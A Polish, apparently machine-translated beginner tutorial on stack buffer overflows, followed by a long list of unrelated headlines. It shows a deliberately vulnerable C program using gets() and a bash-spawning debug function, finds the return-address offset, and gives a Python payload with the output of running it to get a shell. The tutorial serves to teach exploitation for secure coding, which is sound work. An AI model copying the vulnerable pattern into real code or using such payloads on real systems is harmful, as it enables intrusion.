Twoje pierwsze przepełnienie bufora

Nov 27 2022
Niezależnie od tego, czy jesteś studentem, programistą czy menedżerem w firmie, powinieneś tego spróbować. Kluczem do pisania bezpiecznego kodu jest zrozumienie, w jaki sposób zły kod się psuje.

Niezależnie od tego, czy jesteś studentem, programistą czy menedżerem w firmie, powinieneś tego spróbować. Kluczem do pisania bezpiecznego kodu jest zrozumienie, w jaki sposób zły kod się psuje. Jedynym sposobem na złamanie złego kodu jest ubrudzenie sobie rąk i rozpoczęcie otwierania skorup w wyzwaniach związanych z eksploatacją binarną. W tym artykule przeprowadzę Cię przez proces przeprowadzania własnego ataku polegającego na przepełnieniu bufora, korzystając z przykładu, który zrobiłem na YouTube.

W jednym z moich filmów na YouTube wyjaśniłem, w jaki sposób ciągi znaków w języku programowania C stały się przyczyną hakowania ludzi. Głównym tego powodem jest to, że nie ma atrybutu upieczonej długości powiązanego z typem ciągu C. Jedynym sposobem sprawdzenia, czy łańcuch jest gotowy, jest przejście do jego końca.

https://youtu.be/fjMrDDj47E8

Koncepcja ta doprowadziła do powstania niezliczonych luk w zabezpieczeniach oprogramowania związanych z przepełnieniem bufora, co w efekcie doprowadziło do tysięcy cyberataków i kradzieży danych osobowych.

Nasz wrażliwy serwer

Poniżej znajduje się kod prostego serwera w C.

#include <stdio.h>
#include <secrets.h>

void debug() 
{
    printf("!! ENTERING DEBUG MODE !!\n");
    system("/bin/bash");
}

int checkPassword()
{
    char password[64];

    printf("password: ");
    gets(password);

    return isValidPassword(password);
}

int main(int argc, char **argv)
{
    printf("WELCOME TO THE SECURE SERVER\n");

    if (checkPassword())
    {
        debug();
    } else {
        printf("Wrong password, sorry;\n");
    }
}

Jednak istnieje tutaj poważna luka. Hasło, które ostatecznie zostanie sprawdzone, jest odczytywane przez funkcję gets , która jest niezwykle wrażliwą funkcją. Jeśli mi nie wierzysz, sprawdź stronę podręcznika, aby uzyskać informacje o pobierach.

Never use gets(). Because it is impossible to tell without knowing the data 
in advance how many characters gets() will read, and because gets() will 
continue to store characters past the end of the buffer, it is extremely 
dangerous to use. It has been used to break computer security. Use fgets() 
instead.

Stos

Programistom i specjalistom ds. bezpieczeństwa cybernetycznego najtrudniej jest zrozumieć, w jaki sposób przekroczenie danych poza buforem może doprowadzić hakera do przejęcia kontroli nad Twoim kodem, a ostatecznie nad komputerem. Dzieje się tak ze względu na sposób, w jaki komputery organizują pamięć podczas działania programu.

Rysunek 1: przykład sterowania przebiegiem programu

W powyższym przykładzie kodu program uruchamia się w main. Po głównym uruchomieniu , w linii 10, wywoływana jest inna_funkcja . Niezwykle ważne jest zrozumienie, w jaki sposób other_function wie, aby przejść do linii 11 po powrocie.

Struktura zawierająca te informacje jest nazywana „stosem”. Stos to obszar pamięci RAM, który jest używany podczas wykonywania programu i służy do przechowywania zarówno informacji o przepływie sterowania (takich jak adresy zwrotne), jak i danych.

Kiedy main wywołuje other_function , adres, który zostanie wykonany jako następny w main po powrocie other_function , jest umieszczany na szczycie stosu. inna_funkcja działa, a następnie program wraca do adresu zapisanego przez main .

W tym miejscu zaczynają mieć znaczenie przepełnienia bufora. Jeśli w danych twojego programu występuje przepełnienie bufora, możesz zmienić informacje o przepływie sterowania i ostatecznie zmienić sposób wykonywania programu.

Spróbuj sam

To samo dotyczy tego fragmentu kodu tutaj. Ideą tego programu jest: jeśli znasz hasło, otrzymujesz powłokę. Niestety, my, hakerzy, nie znamy hasła, więc nie dostajemy powłoki. Ponieważ jednak funkcja pobiera jest używana, możemy wykorzystać lukę w zabezpieczeniach związaną z przepełnieniem bufora i przepełnić adres zwrotny. Zamiast wracać do main , możemy wrócić bezpośrednio do funkcji debugowania bez znajomości hasła.

Śledź tutaj:

https://github.com/lowlevellearning/secure-server-stuff

Funkcjonalność testu

Aby rozpocząć, powinniśmy uruchomić serwer i przetestować jego funkcjonalność. Spróbujmy też odgadnąć hasło.

Dobra, bez kości. Tu zaczyna się hakowanie.

Awaria serwera

Możemy skorzystać z przepełnienia bufora, jak sama nazwa wskazuje, przepełniając bufor. W tym celu udostępniamy więcej danych niż serwer może obsłużyć.

Na dole widzimy, że program miał błąd segmentacji. Oznacza to, że program próbował uzyskać dostęp do pamięci, do której nie miał dostępu. Jeśli jesteś programistą, to jest złe. Ale jeśli próbujesz włamać się na serwer, to dobrze :)

Rozbijmy katastrofę trochę dalej.

Tutaj widzimy, że program wyłączył segfault podczas próby wykonania instrukcji pod adresem 0x41414141. Ten adres powinien wydawać się… dziwny. Co ciekawe, 0x41414141 jest szesnastkową reprezentacją ciągu „AAAA”, co oznacza, że ​​nasz ciąg As przepełnił adres zwrotny i procesor próbował go wykonać. TERAZ HAKOWALI!

Przejąć kontrolę

Aby uzyskać dokładną kontrolę nad adresem zwrotnym, musimy dokładnie określić, która część naszego ciągu ASCII spowodowała awarię programu. Możemy to zrobić, modulując nasz ciąg różnymi znakami i używając znaków do określenia, gdzie zaczyna się i kończy nasza kontrola nad adresem zwrotnym.

Zamiast długiego ciągu As wprowadziliśmy 64 As, po których następuje seria dodatkowych znaków ASCII. 64 to długość naszego bufora wejściowego, więc jest to dobre miejsce do zgadywania długości. Następnie wstawiamy dodatkowe znaki. Aby sprawdzić, gdzie zaczyna się nasza kontrola, użyj tego samego polecenia, co poprzednio.

Teraz możecie zobaczyć, że mamy nowy adres zwrotny. 0x45454545 to szesnastkowa reprezentacja „EEEE”! Oznacza to, że ustaliliśmy, gdzie nasze przepełnienie przejmuje kontrolę nad wskaźnikiem powrotu. Stąd musimy umieścić adres w buforze, na którym nam naprawdę zależy. Próbujemy wrócić do funkcji debugowania, więc powinniśmy umieścić ten adres w miejscu łańcucha EEEE.

Aby określić adres debugowania, uruchamiamy proste polecenie…

objdump -d -Mintel ./hacked | less

Wygląda na to, że adres debugowania to 0x08049296. Jeśli umieścimy adres debugowania w miejscu, w którym był nasz ciąg EEEE, być może uda nam się sterować programem i wrócić do debugowania bez konieczności podawania hasła.

Ostateczny exploit

Możemy to zrobić za pomocą python-fu.

import sys

payload = b"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
payload += b"BBBBCCCCDDDD"
payload += b"\x08\x04\x92\x96"[::-1]

sys.stdout.buffer.write(payload)


user@user:~/vuln$ (python3 exploit.py; cat) | ./hacked
WELCOME TO THE SECURE SERVER

password: !! ENTERING DEBUG MODE !!

cat password
too_kool_4_skoo

Śledź mnie na Medium, przejdź do Subskrybuj na YouTube. Więcej w przyszłości!

Struktury danych w JavaScript
Struktury danych w JavaScript
Czym w ogóle jest lista połączona? [Część 1]
Czym w ogóle jest lista połączona? [Część 1]
Więc powiedz mi o połączonych listach
Więc powiedz mi o połączonych listach
Kiedy wszystko inne zawiedzie, bądź kreatywny
Kiedy wszystko inne zawiedzie, bądź kreatywny
Mój statek kosmiczny na końcu świata
Mój statek kosmiczny na końcu świata
Lasagne z dynią i jarmużem
Lasagne z dynią i jarmużem
Nie bojąc się porażki, Walker Buehler spokojnie odnosi kolejne sukcesy w NLCS Game 6
Nie bojąc się porażki, Walker Buehler spokojnie odnosi kolejne sukcesy w NLCS Game 6
Cóż z Kell: przyjacielu, oczyść swoje jelita!
Cóż z Kell: przyjacielu, oczyść swoje jelita!
Mój sąsiad
Mój sąsiad
Błyszczący
Błyszczący
Kreatywność jako kompas
Kreatywność jako kompas
Wpływ strachu i żalu na kreatywność
Wpływ strachu i żalu na kreatywność
Wpływ samotności na kreatywność
Wpływ samotności na kreatywność
Ale co, jeśli nie mam dokąd wrócić?
Ale co, jeśli nie mam dokąd wrócić?
Niewidzialny smutek
Niewidzialny smutek
Wreszcie rzuciłem palenie
Wreszcie rzuciłem palenie
Nie czuję się już winny, że nie jestem produktywny
Nie czuję się już winny, że nie jestem produktywny
Ameryka zawsze była brutalną, samotną pustynią
Ameryka zawsze była brutalną, samotną pustynią
Krótka recenzja dwóch scen z „Borata 2”
Krótka recenzja dwóch scen z „Borata 2”
Twoje dziecko transpłciowe potrzebuje terapeuty - Ty też
Twoje dziecko transpłciowe potrzebuje terapeuty - Ty też
Lekcje życia dzięki uprzejmości My Transgender Son
Lekcje życia dzięki uprzejmości My Transgender Son
Nie pozwolę, by zmartwienia miały całą moc
Nie pozwolę, by zmartwienia miały całą moc
Drażniące maski na twarz, moda i obawy przed COVID-19
Drażniące maski na twarz, moda i obawy przed COVID-19
Samsung Galaxy Note 20 Ultra: właściwy telefon, zły czas
Samsung Galaxy Note 20 Ultra: właściwy telefon, zły czas
Billy Crystal i Robin Williams zareklamowali całą swoją kameę „Przyjaciele”.
„My Way” Franka Sinatry nie był tak duży jak jego „Old MacDonald”
Paul McCartney powiedział, że miał „szczęście”, że nigdy nie brał heroiny 
Taylor Sheridan właśnie dodał jedną ze swoich ulubionych gwiazd „Yellowstone” do obsady „Lawmen: Bass Reeves”
Jak umarł John Ritter: spojrzenie wstecz na śmierć aktora „Three's Company”.
John Lennon powiedział, dlaczego „The Tonight Show” był „najbardziej żenującym” programem, w jakim kiedykolwiek był
„Chłopiec poznaje świat”: dlaczego pan Turner zniknął z serialu?
Najlepszy czas na odwiedzenie miejsca kręcenia „Domku na prerii”.
Piosenka Beatlesów, którą Peter Asher nazwał „najwspanialszą piosenką, jaką kiedykolwiek słyszałem”
Jak Melissa Gilbert uratowała ptaka, łapiąc go pod koszulą nocną
Dolly Parton pomogła swojej „inwalidzkiej” babci, gdy żadne inne wnuki by tego nie zrobiły - ona też zrobiła jej psikusa
„Ciekawy przypadek Natalii Grace”: gdzie są dziś Nataila, Kristine i Michael Barnett?
Piosenka Paula Simona, która doskonale sparodiowała Boba Dylana 
Nicole Kidman pokochała tę 1 atrakcyjną funkcję, którą Michael Keaton i Val Kilmer udostępnili jako Batman
Paul McCartney wyobrażał sobie, jak jego mama zareagowałaby na jego sukces
David Bowie prawie napisał musical składający się z fałszywych piosenek Boba Dylana
John Lennon powiedział, że piosenka B-52 brzmiała „jak muzyka Yoko”
Paul McCartney był tak zestresowany jedynym odwołanym koncertem The Beatles, że zwymiotował
Porady Jimmy'ego Page'a dla młodych muzyków pochodzą prosto z Podręcznika mówcy motywacyjnego
Piosenka wczesnych Beatlesów, która była jednym z „najbardziej ekscytujących występów” zespołu, według Insidera Fab Four
Jak Paul McCartney zareagował na tytuł utworu The Beatles „Lucy in the Sky with Diamonds”
Spojrzenie wstecz na rolę Buddy'ego Ebsena w „The Andy Griffith Show”
„Nie śpij w metrze” zdumiona Petula Clark
Mick Jagger powiedział, że „Their Satanic Majesties Request” The Rolling Stones zostało zainspirowane Acid, a nie The Beatles
Prince pracował nad piosenką Steviego Nicksa przez godzinę i zarobił połowę tantiem 
Judy Norton z „The Waltons” zdała sobie sprawę, że czasami była „bachorem” podczas kręcenia serialu
Paul McCartney powiedział, że „Sierż. Pepper' Song nie jest o heroinie
Ringo Starr odmawia grania z kliknięciami, co czyni go lepszym perkusistą
John Lennon powiedział 1 linijkę w „Revolution” The Beatles skomentował policję
George Harrison zdenerwował się, że jego teksty do piosenki „Hurdy Gurdy Man” Donovana nie zostały użyte
Petula Clark powiedziała, że ​​„Downtown” ujawniła desperacką piosenkę
MIA zaatakowała kiedyś utwór „Give Peace a Chance” Johna Lennona
Winona Ryder kiedyś udostępniła wszystkie swoje postacie jako „brzydką dziewczynę” na początku swojej kariery
Brad Pitt i Harrison Ford musieli wymyślić „The Devil's Own” w locie, kiedy „scenariusz został wyrzucony”
Jana Duggar: Wszystko, co powiedziała o miłości i jej 5-letnie okno na znalezienie „jednego”
Paul McCartney: Cierpienie sprawiło, że 1 piosenka z „białego albumu” Beatlesów była dobra
Quentin Tarantino podzielił się kiedyś najciekawszą postacią, jaką kiedykolwiek napisał, w „Pulp Fiction”
Rolling Stones: Keith Richards został wkurzony przez 1 grupę fanów muzyki, którzy skrytykowali zespół
Gene Simmons mówi, że komiksy KISS mogą potencjalnie „odtworzyć ludzkość”.
Paul McCartney powiedział, że „When I'm Sixty-Four” The Beatles to żart
Donovan porównał jedną ze swoich piosenek do „Lucy in the Sky with Diamonds” The Beatles
Paul McCartney podzielił się tym, co zrobiło na nim największe wrażenie w Johnie Lennonie, kiedy spotkali się po raz pierwszy
Stevie Nicks „przyczepiła się” do 1 piosenki Joni Mitchell, kiedy poczuła, że ​​jej kariera muzyczna zawodzi
Dlaczego Paul McCartney był „strzeżony” przed mówieniem prawdy o The Beatles
Dolly Parton znalazła Boga w opuszczonym kościele Lokalni nastolatkowie wykorzystywani do seksu
Kariera aktorska Bradleya Coopera była zagrożona, kiedy pracował z Julią Roberts w tym projekcie
Christopher Nolan kiedyś żałował, że przeczytał scenariusz „Pulp Fiction” Quentina Tarantino
Hagfish: ta przypominająca węgorz śluzowa maszyna to koszmar drapieżnika
Czy nowo zmierzony bozon W może złamać model standardowy?
Ketanji Brown Jackson mianowany sędzią Sądu Najwyższego
1500 $ Dzisiaj kupuje przepustkę Yellowstone za 2172
Jak przywrócić ustawienia fabryczne iPhone'a?
Może możesz być za chudy? Poznaj najchudszy drapacz chmur na świecie
Wielkie Ucieczki! 5 dzikich zwierząt, które odpadły i poszły w biegu
Atlas Moth to Behe-moth, plus 5 innych faktów
Jaka jest różnica między demokracją a republiką?
Martha Mitchell: Kobieta, która za dużo wiedziała o Watergate
5 wymownych i trwałych cytatów Mayi Angelou
Niektórzy fizycy i filozofowie twierdzą, że czas może nie istnieć
Czy powinieneś używać Facebooka czy Google do logowania się do innych witryn?
Chief Plenty Coups: Wizjonerski przywódca i obrońca Narodu Wron
Który grejpfrut jest najsłodszy — biały, czerwony czy różowy?
Przekaż swoje włosy, aby pomóc utrzymać naszą wodę w czystości
Znaczenie tatuaży ze średnikami: symbol odporności i solidarności
Czy gotowanie indukcyjne jest lepsze niż gazowe czy elektryczne?
Najwyższa góra w Układzie Słonecznym jest znacznie wyższa niż Everest
Spojrzenie na najbardziej niezapomniane wesela w Białym Domu
Biennale w Wenecji to „Olimpiada Sztuki”
Czy wirtualne elektrownie mogą pomóc ustabilizować amerykańską sieć energetyczną?
Nie wyrzucaj tych kartonowych tub! 10 sposobów na ich ponowne wykorzystanie
Rycerz Mieczy: znaczenie i interpretacja karty Tarota
Myślenie obiektywne i subiektywne oraz zastosowania
Dlaczego Sriracha jest ulubionym gorącym sosem wszystkich?
Inspirująca, tragiczna historia Sophie Scholl, studentki, która przeciwstawiła się Hitlerowi
Jak pozbyć się much drenażowych?
Anioł nr 222: Odsłonięcie symbolicznego znaczenia życia i miłości
The Secrets of Airline Travel Quiz
Czym jest trucizna pigułka i czy Twitter utrzyma Elona Muska w Bay?
Papużki faliste są super towarzyskie i robią świetne zwierzęta
Jaka jest różnica między drożdżami błyskawicznymi a aktywnymi suchymi?
Ukraińscy uchodźcy mogą nigdy nie wrócić do domu, nawet po zakończeniu wojny
Prypeć: ukraińskie miasto duchów w cieniu Czarnobyla
Wesele opiekunowie zwierząt przygotują psiaka na wspaniały dzień
Czy zjadłbyś Casu Marzu, nielegalny ser z robakami?
Czym jest ludobójstwo i czy Rosja popełnia je na Ukrainie?
Kim był Poncjusz Piłat przed i po ukrzyżowaniu Jezusa?
Co to jest rozmazywanie i czy może oczyścić przestrzeń z negatywnej energii?
Czym jest wilgotność i jak wpływa ona na temperaturę?
Skąd pochodzi fraza „On the Lam”?
Mała grupa Samarytan nadal praktykuje swoją starożytną religię
Dlaczego w USA nie ma „bezzwrotnego” systemu rozliczania podatków?
Modliszka z orchidei wygląda jak kwiat, „żądli” jak pszczoła
Susza, zmiany klimatyczne zagrażają przyszłości energetyki wodnej w USA
Where in the World Are You? Take our GeoGuesser Quiz
Dlaczego duże firmy, takie jak Tesla i Amazon, dzielą akcje
Błagam graczy Final Fantasy 14, aby po prostu przeczytali dialog w Dawntrail
Marvel's Black Panther Show będzie najważniejszym serialem animowanym w historii
Dyrektor Twistera nie dostał ostrzeżenia o tornadzie w Twisterach
Xbox ma poważną awarię [Aktualizacja: znowu działa]
Jednym z wielu odrzuconych pomysłów Ryana Reynoldsa na Deadpool 3 była niezależna podróż objazdowa
Ridley Scott „nie był zadowolony”, gdy rozdano sequele Obcego i Łowcy androidów
Sztuczna inteligencja ekshumuje głosy zmarłych gwiazd, aby przeczytać Ci pliki PDF lub cokolwiek innego
Kierowcy udaje się przewrócić Teslę Cybertruck, nie wymaga samodzielnego prowadzenia
Histeria wywołana piłą łańcuchową Cate Blanchett podczas blokady doprowadziła ją na Borderlands
Sąd Najwyższy wysłucha argumentów na temat tego, czy prawo stanu Teksas może określić Twoje nawyki pornograficzne
Niektórzy fani Mortal Kombat martwią się, że najnowsza gra już nie żyje, ale może być bardziej skomplikowana
Powstrzymaj kota od drapania mebli dzięki tym popartym naukowo strategiom
Podsumowanie Niedźwiedzia: Czy Marcus jest najmilszym, najłagodniejszym i najszczerszym mężczyzną w Chicago?
Przygoda Tiany na Bayou przerywa 87 lat dziwnego kanonu księżniczek Disneya
RIP Robert Towne, nagrodzony Oscarem scenarzysta Chinatown
Teraz możesz posiadać najbardziej kultowe bikini w historii science fiction
McLaren po prostu nie może przestać zwalniać kierowców IndyCar, wręcz to uwielbia
Oto dlaczego Eddie Murphy został „zmuszony” do zmiany swojego słynnego śmiechu
BMW nie chce, aby samochody spalone na bagażniku trafiały na sprzedaż
Czy Simone Biles uda się przygotować SZA na igrzyska olimpijskie?
My Elden Ring: Shadow Of The Erdtree Przywołania gracza, rankingowe
Policjant z Beverly Hills: Recenzja Axela F: Eddie Murphy nieskomplikowany powrót do przeszłości w serwisie Netflix
Straszne turbulencje powodują, że mężczyzna wlatuje do kosza na śmieci na wirusowym wideo
Dwoje palestyńskich dzieci doznało „traumy” po tym, jak kobieta rzekomo próbowała je utopić
Lionsgate daje sobie rok na zmianę tytułu Now You See Me 3 na Now You Three Me
Czy chcesz Corvettę, ale chciałbyś, żeby wyglądała okropnie? Chłopcze, mamy dla ciebie samochód
MaXXXine to pulsująca hollywoodzka opowieść, która wydaje się zbyt oswojona
Dziki powód Los młodego bandyty w procesie YSL Rico potrwa dłużej, niż oczekiwano
Żona Zełenskiego tak naprawdę nie kupiła Bugatti Tourbillon pomimo twierdzeń rosyjskiej propagandy
Mężczyzna z Luizjany wysłał mrożące krew w żyłach ostrzeżenie przed szaleństwem przestępczym
Cate Blanchett wyjaśnia, dlaczego wystąpiła w filmie Borderlands
Zrób sobie przysługę i idź obejrzeć najlepsze wydarzenie speedrunningowe roku
Eddie Murphy opowiada o wszystkim podczas swojej wycieczki prasowej „Gliniarz z Beverly Hills: Axel F”.
Nowe błędy oprogramowania Open Source sprawiają, że tysiące aplikacji na iOS jest podatnych na przechwycenie
Sąd Najwyższy orzekł, że Trump ma immunitet za każde przestępstwo popełnione w godzinach od 9 do 5
Land Rover Defender Octa to bestia o mocy 626 KM, która nadejdzie dla Raptorów Świata
Biden krytykuje orzeczenie Sądu Najwyższego o immunitecie Trumpa i zwraca uwagę na niebezpieczeństwo niekontrolowanej władzy
Złe wieści dla Fani Willis i jej sprawy dotyczącej ingerencji w wybory Trumpa
Spędziłem weekend z grą zdalną i grami w chmurze i było naprawdę niesamowicie
Popularny raper YouTube i słynny czarodziej TikTok biorą udział w wirusowym meczu szczekania
Siostrzenica Luthera Vandrossa ma coś do powiedzenia na temat jego rozdzierającego serce wywiadu z Oprah Winfrey po udarze mózgu
Czy za 9800 dolarów „zapakowałbyś ich” do tej siedmiomiejscowej Toyoty RAV4 z 2008 roku?
Sonda: Demokraci podążają śladem Trumpa, czy zastąpią Bidena Bidenem, Bidenem czy Bidenem
Obejrzyj Motorweek testujący Sterlinga, zapomniane brytyjskie podejście do legendy Acury
Pamiętasz, jak holenderska linia lotnicza wrzuciła 440 wiewiórek do ogromnej niszczarki?
Niedobrze: huragan Beryl to najwcześniejsza burza kategorii 5 w zapisanej historii
Furgonetka dostawcza Amazon zapala się w wyniku ognistej eksplozji podczas letnich upałów w Houston
Papież Franciszek zatwierdził pierwszego świętego Tysiąclecia
Kim jest żona Jaya Shetty’ego? Wszystko o Radhi Devlukii-Shetty
Córka Kevina Jonasa, Alena, wygląda na dorosłą na zdjęciu urodzinowym: „9 lat nie wydaje się prawdziwe”
Tom Girardi uczestniczy w rozprawie, aby określić, czy jest on uprawniony do stanięcia przed sądem pod zarzutem oszustwa
Bengals Running Back Joe Mixon poszukiwany nakazem aresztowania wydanym za rzekome wycelowanie broni palnej w kobietę
Marvel faktycznie publikuje fikcyjne wspomnienie Scotta Langa z „Ant-Man and the Wasp: Quantumania”
Kim jest mąż Lisy Vanderpump? Wszystko o Kenie Toddzie
Posiadłość Kim Zolciak-Biermann i Kroy Biermann List w Gruzji na sprzedaż w Splicie
Kim jest żona Johna Cleese'a? Wszystko o Jennifer Wade
Historia randek Avy Gardner: spojrzenie wstecz na małżeństwa i romanse ikony Hollywood
Kim jest żona Vince'a Vaughna? Wszystko o Kyli Weber
Dwayne Johnson mówi, że jego mama jest „w porządku” po nocnym wypadku samochodowym, „będzie nadal oceniana”
Yasmin Vossoughian z MSNBC mówi, że lekarz zwolnił jej bóle w klatce piersiowej jako refluks, a potem zaczął się jej „koszmar”
Margaret Josephs broni „niszczycielskiego” wyboru Melissy i Joe Gorga, aby pominąć ślub Teresy Giudice
Kobieta znaleziona żywa i „z trudem łapiąc powietrze” w worku na zwłoki w domu pogrzebowym w Iowa
Chelsea Houska z „Nastoletniej mamy” dzieli się płaczliwymi reakcjami na odnowienie 2. sezonu programu HGTV: „Tak wiele znaczy”
Kalendarium związku Maggie Gyllenhaal i Petera Sarsgaarda
Jimmy Buffett, piosenkarz „Margaritaville”, nie żyje w wieku 76 lat
Matthew McConaughey ujawnia, że ​​wróżka kazała mu zagrać w filmie „Jak stracić faceta w 10 dni”
Zaginiona 17-letnia dziewczyna prawdopodobnie zamarzła na śmierć po wjechaniu do rowu w wiejskim stanie Wisconsin: urzędnicy
Wszystko o relacjach Zoë Kravitz z rodzicami Lennym Kravitzem i Lisą Bonet
Piosenkarka „Flashdance” Irene Cara zmarła z powodu nadciśnienia i wysokiego cholesterolu: raport
Molly Ringwald świętuje 22. rocznicę z mężem Panio Gianopoulosem: „Najlepsza decyzja, jaką kiedykolwiek podjęłam”
Charly Reynolds ujawnia niedawną operację strun głosowych: „Miałem problemy ze śpiewaniem”
Bob Barker, wieloletni gospodarz programu „The Price Is Right”, zmarł w wieku 99 lat: „Najlepszy MC na świecie”
Rodzina Yary Shahidi: wszystko o rodzicach i rodzeństwie aktorki
TJ Watt chce, aby Tom Brady i brat JJ zostali razem wprowadzeni do Galerii Sław NFL
Kim jest narzeczony JWoww? Wszystko o Zacku Claytonie Carpinello
Znaleziono ciała prawdopodobnie należące do raperów zaginionych od czasu odwołania koncertu: „Nie zasłużyli na to”
Gwyneth Paltrow ujawnia sukienkę na randkę, którą zachowała ze swojego związku z Bradem Pittem 
Animal Rescue ostrzega „Nigdy nie farbuj ptaka” po tym, jak „walczący” różowy gołąb został znaleziony błąkający się po Nowym Jorku
Heather Rae i Tarek El Moussa witają swojego synka: „Nasze serca są takie szczęśliwe”
Aktorzy serialu Laguna Beach: Gdzie są teraz?
Lista posiadłości Kirstie Alley zawiera dom późnej gwiazdy na Florydzie za 6 milionów dolarów, który kupiła od Lisy Marie Presley
Muni Long mówi, że jeszcze nie „przetworzyła”, zdobywając 3 nominacje Grammy: „Wszystko idzie tak szybko”
Danielle Moné Truitt z „Prawa i porządku” uważa, że ​​fani zostali „oszukani; Autorstwa Stablera i Bensona Kiss Tease
Eric i Jessie James Decker zawsze „całują się nawzajem” - a dzieciom się to nie podoba
Susan Lucci ze łzami w oczach wspomina zmarłego męża, kiedy przyznaje, że „nie jest gotowa” na randki
Kupujący zgadzają się, że ta zamiatarka Black + Decker jest „znacznie szybsza” niż tradycyjna miotła i jest w sprzedaży
Łyżwiarstwo figurowe w USA „sfrustrowane” brakiem ostatecznej decyzji w zawodach drużynowych, wzywa do sprawiedliwego orzeczenia
Whoopi Goldberg pokazuje Kit Harington swoją „Grę o tron” - toaletę inspirowaną: „Prawdziwy żelazny tron”
Paul McCartney o byciu „romantycznym” z żoną Nancy Shevell: „Całkowicie przesadzam z walentynkami”
Olimpijka Jasmine Camacho-Quinn świętuje, że jej brat Robert Quinn zmierza na Super Bowl
Kupujący Amazon mówią, że śpią „jak rozpieszczone dziecko” dzięki tym jedwabnym poszewkom na poduszki, które kosztują zaledwie 10 USD
Kim jest żona Jasona Kennedy'ego? Wszystko o Lauren Scruggs Kennedy
Chloe Cherry z „Euphorii” oskarżona o kradzież za rzekomą kradzież bluzki za 28 dolarów
Kalendarium związku Gartha Brooksa i Trishy Yearwood
Profesor Purdue University aresztowany za rzekomy handel metamfetaminą i proponowanie kobietom usług seksualnych
Kalendarium związku Suzanne Somers i Alana Hamela
Jaka jest najbardziej użyteczna rzecz, jaką mogę zrobić, gdy mam 14 lat?
Czy dojrzewanie przebiega etapami? Czy może się zatrzymać, a potem zacząć od nowa?
Mam 13 lat w depresji i chcę iść z tym do lekarza, ale boję się tego i że moi rodzice uznają to za moje hormony i tak dalej. Co powinienem zrobić?
Jakie zmiany zajdą, jeśli przejdziesz na HTZ w wieku 13 lat?
Jeśli chcę dowiedzieć się, jak rozpocząć leczenie zmiany płci, jakiego lekarza powinienem odwiedzić?
Czy wszyscy przechodzą okres dojrzewania?
Dlaczego nigdy nie widziałem osoby transpłciowej między kobietą a mężczyzną?
Twoim zdaniem, która zmiana płci jest trudniejsza, z kobiety na mężczyznę (KM) czy z mężczyzny na kobietę (MK)?
Mam 21 lat. Co mogę teraz zrobić, aby na zawsze zmienić moje życie?
Mam 14 lat, której hobby łatwo się nudzi. Jak odnajduję swoją pasję i talent?
Jaka jest najważniejsza rzecz, o której 14-letni nastolatek powinien pamiętać?
Mam 17 lat i planuję przejść do HRT, kiedy skończę studia w tym roku jako 18-latek. Do tego czasu, co mogłem zrobić, aby poczuć się bardziej kobieco?
Jak żyć pełnią życia jako 19-latek?
Czy HTZ jest zalecane dla nastolatków transpłciowych?
Mam 14 lat, jakie rady chciałbyś mi udzielić, co będzie pomocne do końca mojego życia?
Mam 19 lat. Czy nadal przechodzę okres dojrzewania?
Czy spironolakton jest zły dla HTZ?
Czy możesz zacząć hormony MTF HRT w wieku 13 lat?
Jak rozpocząć przejście z mężczyzny na kobietę? W środku zawsze byłam dziewczyną. Co muszę zrobić?
Jakie są plusy i minusy dojrzewania?
Jutro skończę 16 lat. Jaką konkretną radę możesz dać 16-letniemu chłopcu?
Jakie to uczucie, gdy rosną piersi podczas zmiany płci z męskiej na żeńską?
Przechodzę z kobiety na mężczyznę. Jakie powinno być moje nowe imię?
Jak zatrzymać dojrzewanie bez blokerów dojrzewania?
Jak umówić się na wizytę u lekarza bez rodziców i bez znajomości powodu mojego wyjazdu? Mam 15 lat.
Jakie są negatywne skutki okresu dojrzewania (zdrowie psychiczne itp.)?
Mam 23 lata. Co mogę teraz zrobić, aby na zawsze zmienić moje życie?
Mam 30 lat. Co mogę teraz zrobić, aby na zawsze zmienić moje życie?
Mam 19 lat i jestem jedynakiem. Wpadam w depresję i martwię się, że coś się stanie moim rodzicom, ponieważ to wszystko, co mam. Nie mam żadnych przyjaciół i nie udało mi się ich zdobyć podczas pandemii. Boję się samotności, co mogę zrobić, aby sobie pomóc?
W jakim wieku najlepiej rozpocząć przemianę z kobiety w mężczyznę?
Mam 17 lat, co powinienem zrobić, aby zdobyć więcej wiedzy?
Jakie leki mogą zmienić mężczyznę w kobietę bez operacji?
Jaki jest najlepszy sposób na naturalne przejście z mężczyzny w kobietę?
Czy to w porządku, że mam 13 lat, ale w głębi serca wciąż jestem dzieckiem?
Jakie są niezbędne umiejętności życiowe, które mogę opanować podczas tego 3-miesięcznego lata? Mam 17 lat.
Za miesiąc skończę 17 lat i myślałem, że tak naprawdę nie czuję się inaczej niż w wieku 11 lat, czy to normalne? Czy naprawdę zmienię się z wiekiem?
Czy dobrym pomysłem jest rozpoczęcie HTZ w wieku 18 lat (transpłciowy)?
Co powinno się stać, jeśli nigdy nie przejdziesz przez okres dojrzewania?
Jako 13-latek, jak mogę oszczędzać i przechowywać pieniądze bez wiedzy moich rodziców?
Co może zrobić 14-latek, aby uczynić swoje życie lepszym/łatwiejszym?
Jak mogę zmienić swoje życie w wieku 17 lat?
Mam dziś 19 lat. Jaka jest najważniejsza rzecz, której powinienem się nauczyć?
Czy nadal jestem osobą transpłciową (FTM), jeśli objawy zaczęły pojawiać się dopiero w okresie dojrzewania?
Transgender: Jaka była najtrudniejsza część twojej przemiany z mężczyzny w kobietę?
Właśnie skończyłem 17 lat, co mam teraz zrobić, aby zapewnić sobie jak najlepsze życie?
W przyszłym miesiącu skończę 16 lat. Jak mam zatrudnić terapeutę, jeśli moja mama uważa, że ​​go nie potrzebuję?
Jak mogę otrzymać HTZ, nie mówiąc, że chcę HTZ?
Czy operacja pośladków jest tego warta, aby przejść z mężczyzny w kobietę?
„Nie ponoszą winy i nie umierają”
Zapytaj o pozwolenie [przedrostek] [wrostek] [przyrostek]. Co [w całości]?
Jaka jest decyzja o toczeniu wojny w miastach?
Bardziej szczegółowe omówienie incydentu związanego z bezpieczeństwem z maja 2019 r .: opinie na blogu
Czy możemy wytwarzać energię elektryczną z marsjańskich burz piaskowych? Jeśli tak, czy można go użyć do zasilania kolonii?
O odrzuceniu studenta ze względu na problemy zdrowotne przez promotora doktoratu
Puzzle przesuwne 3 x 2
Mojżesz pierwsza grupa przywódców Wyjścia 18:21
Zasada odbicia a wszechświaty
Regex_search c++
Studium przypadku: co trzeba zrobić, aby sformułować i udowodnić argument małego obiektu Quillena w ZFC?
java: pobierz liczbę wszystkich odrębnych kluczy i wartości w Map <String, Set <String>> [duplicate]
